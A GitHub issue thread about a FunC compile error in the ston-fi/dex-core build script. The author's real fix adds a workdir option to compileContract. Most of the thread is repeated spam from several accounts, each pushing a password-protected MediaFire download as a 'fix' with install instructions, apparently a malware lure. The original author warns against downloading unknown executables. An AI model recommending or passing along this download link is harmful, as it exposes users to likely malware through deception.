### ISSUE TITLE
Func compilation error

### ISSUE THREAD

**Issue by zcqzcg** [ston-fi/dex-core#9]
## Compilation failed of `no such file` And solution
After `npm install`, we run `npm run build`
And for some reason, we could occur into this error:
```shell
$ npm run build

> @ston-fi/dex-core@1.0.0 build
> ts-node ./build/_build.ts

=================================================================
Build script running, let's find some FunC contracts to compile..

* Found contract 'lp_account' - let's compile it:

* Compilation failed!
Func compilation error: /working/contracts\lp_account.func:3:1: error: ENOENT: no such file or directory, open 'C:\Users\pc\Desktop\TON_Contract\dex-core\common\stdlib.func'
```

## Solution is:

 - In the file `./build/_build.ts`
 - Add param to Line 19 ~ 20 like this:
 ```js
     let result = await compileContract({
      files: [rootContract],
      workdir: "contracts",  // this line added
    });
 ```
 
 This fix my issue.
 Leave a record to here in case someone else might waste time on this error.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by zcqzcg** [comment]
**For anyone is seeing this issue, please don't download any exe that you don't know about it.**

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
